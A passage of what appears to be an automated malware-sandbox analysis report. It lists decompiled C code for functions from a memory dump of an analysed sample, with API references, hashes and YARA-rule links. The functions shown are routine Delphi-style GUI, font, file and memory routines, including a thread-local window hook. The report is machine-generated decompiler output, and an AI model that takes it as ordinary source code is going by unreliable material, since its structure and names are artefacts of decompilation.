				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408C90(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408BD4(_a12, _t49);
				}
			}

0x0044910f
0x00449111
0x00449113
0x0044911e
0x00000000
0x004491a2
0x00449122
0x00449132
0x0044914f
0x00449154
0x00449159
0x00449166
0x00449166
0x00449134
0x0044913b
0x00449148
0x00449148
0x0044916d
0x00000000
0x0044916f
0x00449172
0x00449181
0x00000000
0x00449189

APIs

GetMenuState.USER32 ref: 0044912B
GetSubMenu.USER32 ref: 00449136
GetMenuItemID.USER32(?,?), ref: 0044914F
GetMenuStringA.USER32(?,?,?,?,?), ref: 004491A2

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: 7d59ce4a75b46e58925364685ced3c6dc0ff2d3d6530cc81ef1e2fedc84a76e6
Instruction ID: f757e5f0d8e1f70435e9771e1cf823c58798244c1ee4a307b9815b5b9bcc76ed
Opcode Fuzzy Hash: 7d59ce4a75b46e58925364685ced3c6dc0ff2d3d6530cc81ef1e2fedc84a76e6
Instruction Fuzzy Hash: 72118E31601215AFE740EE2ECC859AF77E8AF89364B11446EF809D7381DA389D01E7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0045AF04, Relevance: 6.1, APIs: 4, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045AF04(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045AE9C(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043C1F4(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045AE18(_t43);
				SetWindowPos(E0043C1F4(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045AE18(_t43);
				}
				_t26 = E004037D8( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043C1F4(_t43));
				}
				return _t26;
			}

0x0045af08
0x0045af0a
0x0045af0c
0x0045af0f
0x0045af14
0x0045af16
0x00000000
0x0045af1a
0x0045af28
0x0045af2e
0x0045af30
0x0045af47
0x0045af47
0x0045af32
0x0045af3a
0x0045af3f
0x0045af41
0x00000000
0x0045af43
0x0045af43
0x0045af43
0x0045af41
0x0045af4d
0x0045af72
0x0045af7b
0x0045af81
0x0045af83
0x0045af87
0x0045af87
0x0045af96
0x0045af9b
0x0045af9d
0x00000000
0x0045afa7
0x0045afb0

APIs

IsRectEmpty.USER32 ref: 0045AF0F
IsWindowVisible.USER32(00000000), ref: 0045AF3A
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045B01B,0045FE64), ref: 0045AF72
SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045B01B,0045FE64), ref: 0045AFA7

Part of subcall function 0045AE9C: IsWindowVisible.USER32(00000000), ref: 0045AEB3
Part of subcall function 0045AE9C: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD0E,0045FD16,?,?,0045B66C), ref: 0045AEDA
Part of subcall function 0045AE9C: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD0E,0045FD16,?,?,0045B66C), ref: 0045AEFA

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$FocusVisible$EmptyRect
String ID:
API String ID: 698668684-0
Opcode ID: 2877f2ad69c9b5a78960e03bd37a5484874dabc5f16aa4b2564faba7931df6f9
Instruction ID: 57f5d61e95266162c302e8bd97bb1095e2aa755107e443e22d382ac4060c7050
Opcode Fuzzy Hash: 2877f2ad69c9b5a78960e03bd37a5484874dabc5f16aa4b2564faba7931df6f9
Instruction Fuzzy Hash: 2A11CAA23002015FC510B67A8C85A6BB3DC9F4534AB08426AFD58EB343CB2CEC15A76F

Uniqueness

Uniqueness Score: -1.00%

Function 0042291C, Relevance: 6.1, APIs: 4, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042291C(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				void* _t21;
				void* _t23;
				int _t26;
				void* _t30;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t36;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t30 = __edx;
				_t26 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t33 =  *((intOrPtr*)( *__eax + 0x24))();
					_t36 = 0;
					if(_t33 != 0) {
						_push(0xffffffff);
						_push(_t33);
						_t23 = E00420704(__edx);
						_push(_t23);
						L00406C64();
						_t36 = _t23;
						_push(E00420704(_t30));
						L00406C34();
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t32 = _t30;
					_t35 = _t33;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E00420704(_t32),  *( *((intOrPtr*)(_t26 + 0x28)) + 8),  &_v32);
					if(_t35 != 0) {
						_push(0xffffffff);
						_push(_t36);
						_t21 = E00420704(_t32);
						_push(_t21);
						L00406C64();
						return _t21;
					}
				}
				return _t11;
			}

0x0042291c
0x00422923
0x00422926
0x00422928
0x0042292e
0x00422937
0x00422939
0x0042293d
0x0042293f
0x00422941
0x00422944
0x00422949
0x0042294a
0x0042294f
0x00422958
0x00422959
0x00422959
0x00422969
0x0042296a
0x0042296b
0x0042296c
0x0042296d
0x0042296e
0x0042296f
0x00422973
0x0042298b
0x00422992
0x00422994
0x00422996
0x00422999
0x0042299e
0x0042299f
0x00000000
0x0042299f
0x00422992
0x004229ab

APIs

72E7B410.GDI32(00000000,00000000,000000FF), ref: 0042294A
72E7B150.GDI32(00000000,00000000,00000000,000000FF), ref: 00422959
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042298B
72E7B410.GDI32(00000000,00000000,000000FF,00000000,?,?), ref: 0042299F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B410$B150FileMetaPlay
String ID:
API String ID: 1962039817-0
Opcode ID: 54b032dc3997382d3c648a3e39e2d6cc26706bd36d5c420c9aafbc1f914f00b0
Instruction ID: f5adf016cef96925e87f4465e5f6b9b27bb554d4f64d10c9ea15436507f7d3d3
Opcode Fuzzy Hash: 54b032dc3997382d3c648a3e39e2d6cc26706bd36d5c420c9aafbc1f914f00b0
Instruction Fuzzy Hash: EE01A5B1708220ABC610AB6D9C8495BB3DDEFC5334F05473AF854E7382D679DC41CA99

Uniqueness

Uniqueness Score: -1.00%

Function 00408930, Relevance: 6.0, APIs: 4, Instructions: 39
timefileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408930(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E004045B0( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}

0x00408931
0x00408934
0x00408950
0x00408947
0x00000000
0x00408949
0x00408949
0x00408949
0x0040898f
0x00408992
0x00408992
0x0040895d
0x0040896c
0x00408974
0x0040897a
0x00408988
0x0040898d
0x00000000

APIs

FindNextFileA.KERNEL32(?,?), ref: 00408940
GetLastError.KERNEL32(?,?), ref: 00408949
FileTimeToLocalFileTime.KERNEL32(?), ref: 0040895D
FileTimeToDosDateTime.KERNEL32 ref: 0040896C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: db27a5cef56bbba3b33402563997924791849041ba68b6d132b42de9cb14f02d
Instruction ID: e6ade6a12cc37e4ff0def18c17877ece12b579765ebcc45602a1fed6474587a8
Opcode Fuzzy Hash: db27a5cef56bbba3b33402563997924791849041ba68b6d132b42de9cb14f02d
Instruction Fuzzy Hash: DEF036B25051019FCF04FF64C9C289737DC9B4431431485B7ED45DF286EA38D55487B5

Uniqueness

Uniqueness Score: -1.00%

Function 00453ECC, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00453ECC(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x492c04; // 0x2410d40
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x492c1c == 0) {
						_t2 = SetWindowsHookExA(3, E00453E88, 0, GetCurrentThreadId());
						 *0x492c1c = _t2;
					}
					if( *0x492c18 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x492c18 = _t2;
					}
					if( *0x492c20 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00453E2C, 0, 0, _t7);
						 *0x492c20 = _t2;
					}
				}
				return _t2;
			}

0x00453ecd
0x00453ed9
0x00453ee2
0x00453ef4
0x00453ef9
0x00453ef9
0x00453f05
0x00453f0f
0x00453f14
0x00453f14
0x00453f20
0x00453f33
0x00453f38
0x00453f38
0x00453f20
0x00453f3e

APIs

GetCurrentThreadId.KERNEL32 ref: 00453EE4
SetWindowsHookExA.USER32 ref: 00453EF4
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,004566FA,?,?,02410D40,?,?,00456128,?), ref: 00453F0F
CreateThread.KERNEL32(00000000,000003E8,00453E2C,00000000,00000000), ref: 00453F33

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: a029828d2ed7ef9a2133aa6c0c65927439a02c1754ce3a1a3ad1f13271e0cfd5
Instruction ID: fd2bdbd6825346d59a64741b3253542142a3dc76f22bf051d0565e67b4e4aa31
Opcode Fuzzy Hash: a029828d2ed7ef9a2133aa6c0c65927439a02c1754ce3a1a3ad1f13271e0cfd5
Instruction Fuzzy Hash: 1AF0DA71A853007EF621AF25DE47F2A36949334B5BF10413BF6047A1D3CBF856888AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004260B8, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004260B8(struct HDC__* __eax) {
				intOrPtr _v32;
				void* _t4;
				intOrPtr _t7;
				struct HDC__* _t8;
				struct tagTEXTMETRICA* _t9;

				_t7 = 1;
				_push(0);
				L00406EA4();
				_t8 = __eax;
				if(__eax != 0) {
					_t4 =  *0x492a3c; // 0x58a00b4
					if(SelectObject(__eax, _t4) != 0 && GetTextMetricsA(_t8, _t9) != 0) {
						_t7 = _v32;
					}
					_push(_t8);
					_push(0);
					L00407114();
				}
				return _t7;
			}

0x004260bd
0x004260bf
0x004260c1
0x004260c6
0x004260ca
0x004260cc
0x004260da
0x004260e7
0x004260e7
0x004260eb
0x004260ec
0x004260ee
0x004260ee
0x004260fa

APIs

72E7AC50.USER32(00000000), ref: 004260C1
SelectObject.GDI32(00000000,058A00B4), ref: 004260D3
GetTextMetricsA.GDI32(00000000), ref: 004260DE
72E7B380.USER32(00000000,00000000,00000000,058A00B4,00000000), ref: 004260EE

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B380MetricsObjectSelectText
String ID:
API String ID: 3841012960-0
Opcode ID: 2eab4d2fe0b0b8f4dbfb164123b17a5649bae200663ea8f27980d139a7f5888b
Instruction ID: 13d47de5f68260cb03a6a485c106516f054eea557b4dd22363026adbf38592c8
Opcode Fuzzy Hash: 2eab4d2fe0b0b8f4dbfb164123b17a5649bae200663ea8f27980d139a7f5888b
Instruction Fuzzy Hash: 71E0482174657027D51171655D42B9B354C4F03764F490136FD44AE3C1DB5EDD10D2FA

Uniqueness

Uniqueness Score: -1.00%

Function 00423FD0, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00423FD0(void* __eflags) {
				intOrPtr _t13;
				intOrPtr _t19;
				void* _t20;

				DeleteObject( *(_t20 - 0x10));
				E00403DD0();
				E00403E24();
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x424021);
				DeleteDC( *(_t20 - 0x1c));
				_t13 =  *((intOrPtr*)(_t20 - 0x18));
				_push(_t13);
				_push(0);
				L00407114();
				if( *(_t20 - 0x10) != 0) {
					return GetObjectA( *(_t20 - 0x10), 0x54,  *(_t20 + 0xc));
				}
				return _t13;
			}

0x00423fd4
0x00423fd9
0x00423fde
0x00423fe5
0x00423fe8
0x00423feb
0x00423ff4
0x00423ff9
0x00423ffc
0x00423ffd
0x00423fff
0x00424008
0x00000000
0x00424014
0x00424019

APIs

DeleteObject.GDI32(?), ref: 00423FD4
DeleteDC.GDI32(?), ref: 00423FF4
72E7B380.USER32(00000000,?,?,00424021), ref: 00423FFF
GetObjectA.GDI32(?,00000054,?), ref: 00424014

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteObject$B380
String ID:
API String ID: 2559486108-0
Opcode ID: 1da6a4705c37b91583de7ec29b46334c79ccb9cd44601d8de0a978bef9875844
Instruction ID: 1c1ab6a449de7732c6b8ccdae0aacd61de7e6927c2f9cab643fca07f8c156af7
Opcode Fuzzy Hash: 1da6a4705c37b91583de7ec29b46334c79ccb9cd44601d8de0a978bef9875844
Instruction Fuzzy Hash: DEE03071A04115AADB00EBE5D846A7E77F8EB44305F40042AB610EB1C1C63CA840C729

Uniqueness

Uniqueness Score: -1.00%

Function 004072AC, Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004072AC(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x004072af
0x004072b6
0x004072bb
0x004072c1
0x004072c6

APIs

GlobalHandle.KERNEL32 ref: 004072AF
GlobalUnWire.KERNEL32 ref: 004072B6
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 004072BB
GlobalFix.KERNEL32 ref: 004072C1

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: 92f1bc27c9634726b2f0a239413a7c54f03635f944e1005175901a3c56d1670f
Instruction ID: 259ab7e85c60211505b58427907bbc6fc2cc1ee7dc874fbd9d5750fb2c8aca08
Opcode Fuzzy Hash: 92f1bc27c9634726b2f0a239413a7c54f03635f944e1005175901a3c56d1670f
Instruction Fuzzy Hash: DEB009C4820222BCE80473B34C0BE3B289C9880B1C383497F3406B2C83987E982841BA

Uniqueness

Uniqueness Score: -1.00%

Function 0041F414, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041F414(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41f59d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041F5A4);
					return E0040436C( &_v80, 3);
				} else {
					_t76 =  *0x492a74; // 0x2410658
					E0041E798(_t76);
					_push(_t137);
					_push(0x41f575);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E004045A4( &_v72, _v8 + 0x1b);
						if(E00408628(_v72, "Default") != 0) {
							E004045A4( &_v80, _v8 + 0x1b);
							E00408C6C( &(_v68.lfFaceName), _v80);
						} else {
							E004045A4( &_v76, "\rMS Sans Serif");
							E00408C6C( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041F6F8(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41f57c);
					_t81 =  *0x492a74; // 0x2410658
					return E0041E7A4(_t81);
				}
			}

0x0041f415
0x0041f417
0x0041f41d
0x0041f420
0x0041f423
0x0041f426
0x0041f42a
0x0041f42b
0x0041f430
0x0041f433
0x0041f439
0x0041f443
0x0041f587
0x0041f58a
0x0041f59c
0x0041f449
0x0041f449
0x0041f44e
0x0041f455
0x0041f456
0x0041f45b
0x0041f45e
0x0041f468
0x0041f474
0x0041f479
0x0041f47e
0x0041f483
0x0041f48d
0x0041f498
0x0041f48f
0x0041f48f
0x0041f48f
0x0041f4a9
0x0041f4b6
0x0041f4c3
0x0041f4cc
0x0041f4d8
0x0041f4ec
0x0041f511
0x0041f51c
0x0041f4ee
0x0041f4f6
0x0041f501
0x0041f501
0x0041f521
0x0041f525
0x0041f529
0x0041f534
0x0041f536
0x0041f53e
0x0041f538
0x0041f53a
0x0041f544
0x0041f53c
0x0041f54a
0x0041f54a
0x0041f53a
0x0041f55a
0x0041f55a
0x0041f55f
0x0041f562
0x0041f565
0x0041f56a
0x0041f574
0x0041f574

APIs

Part of subcall function 0041E798: RtlEnterCriticalSection.KERNEL32(?,0041E7D5), ref: 0041E79C

CreateFontIndirectA.GDI32(?), ref: 0041F552

Strings

Default, xrefs: 0041F4E0
MS Sans Serif, xrefs: 0041F4F1

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateCriticalEnterFontIndirectSection
String ID: MS Sans Serif$Default
API String ID: 2931345757-2137701257
Opcode ID: 235641115eaf7087f4a27fd447ab1447b251295f7c6042ca9a81122b6808554d
Instruction ID: 64183040bfa769755d635c6de005338080203cf3be7aeb1155d4dd07bedbb18e
Opcode Fuzzy Hash: 235641115eaf7087f4a27fd447ab1447b251295f7c6042ca9a81122b6808554d
Instruction Fuzzy Hash: 6C515231A04248EFDB11CFA8C545BCDBBF6AF49304F6540BAD800A7352D3789E4ADB29

Uniqueness

Uniqueness Score: -1.00%

Function 0045E324, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045E324(char __eax, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v96;
				intOrPtr _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				intOrPtr _t36;
				void* _t52;
				int _t60;
				intOrPtr _t81;
				intOrPtr* _t106;
				void* _t107;

				_v8 = __eax;
				_t106 =  &_v8;
				_t36 = E0043C4F8( *_t106);
				if(_t36 != 0) {
					_t36 =  *_t106;
					if( *((char*)(_t36 + 0x254)) != 0) {
						E0045C724( *_t106,  &_v124);
						_v24 =  *((intOrPtr*)( *_t106 + 0x21c)) - 1;
						_v20 =  *((intOrPtr*)( *_t106 + 0x24c)) - 1;
						E0045C95C( &_v124,  &_v24,  &_v132);
						_v24 = _v132;
						_v20 = _v128;
						_t52 =  *((intOrPtr*)( *_t106 + 0x254)) - 1;
						if(_t52 == 0 || _t52 == 2) {
							if( *((intOrPtr*)( *_t106 + 0x21c)) != 1) {
								_t60 = MulDiv( *((intOrPtr*)( *_t106 + 0x258)) -  *((intOrPtr*)( *_t106 + 0x238)), 0x7f, _v24 -  *((intOrPtr*)( *_t106 + 0x238)));
								__eflags = 0;
								E0045E2A4(0, _t60, 0, _t107);
							} else {
								_v12 = E0045F798( *_t106, _v96);
								_v16 = E00435578( *_t106) - _v120;
								_t81 =  *((intOrPtr*)( *_t106 + 0x288));
								if(_t81 <= 0) {
									L8:
									E0045E2A4(0, _t81, __eflags, _t107);
								} else {
									_t24 =  &_v16; // 0x45e239
									_t115 = _v12 - _t81 -  *_t24;
									if(_v12 - _t81 >=  *_t24) {
										goto L8;
									} else {
										_t26 =  &_v16; // 0x45e239
										E0045DAEC( *_t106, 4, 0, _t115, 1, _v12 -  *_t26);
									}
								}
							}
						}
						_t36 =  *((intOrPtr*)( *_t106 + 0x254)) + 0xfe - 2;
						if(_t36 < 0) {
							return E0045E2A4(1, MulDiv( *((intOrPtr*)( *_t106 + 0x25c)) -  *((intOrPtr*)( *_t106 + 0x23c)), 0x7f, _v20 -  *((intOrPtr*)( *_t106 + 0x23c))),  *((intOrPtr*)( *_t106 + 0x25c)) -  *((intOrPtr*)( *_t106 + 0x23c)), _t107);
						}
					}
				}
				return _t36;
			}

0x0045e32c
0x0045e32f
0x0045e334
0x0045e33b
0x0045e341
0x0045e34a
0x0045e355
0x0045e363
0x0045e36f
0x0045e37e
0x0045e386
0x0045e38c
0x0045e397
0x0045e399
0x0045e3ac
0x0045e420
0x0045e427
0x0045e429
0x0045e3ae
0x0045e3b8
0x0045e3c5
0x0045e3ca
0x0045e3d2
0x0045e3f7
0x0045e3fc
0x0045e3d4
0x0045e3d9
0x0045e3d9
0x0045e3dc
0x00000000
0x0045e3de
0x0045e3e1
0x0045e3f0
0x0045e3f0
0x0045e3dc
0x0045e3d2
0x0045e3ac
0x0045e439
0x0045e43b
0x00000000
0x0045e469
0x0045e43b
0x0045e34a
0x0045e46f

APIs

MulDiv.KERNEL32(?,0000007F,?), ref: 0045E459

Part of subcall function 0045E2A4: GetScrollPos.USER32(00000000,0000FFC8), ref: 0045E300
Part of subcall function 0045E2A4: SetScrollPos.USER32 ref: 0045E319

Strings

9E, xrefs: 0045E3D9, 0045E3E1, 0045E3E4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Scroll
String ID: 9E
API String ID: 3938139061-2110824515
Opcode ID: ef076b6f91338936a2bb02e87197e972c589a1f9fb8b6cd06bf34d3e7bd53693
Instruction ID: de22b2d6b14abcdee14fd2ecfa3518816f25c4360ea5400ce03ee1d267647bf5
Opcode Fuzzy Hash: ef076b6f91338936a2bb02e87197e972c589a1f9fb8b6cd06bf34d3e7bd53693
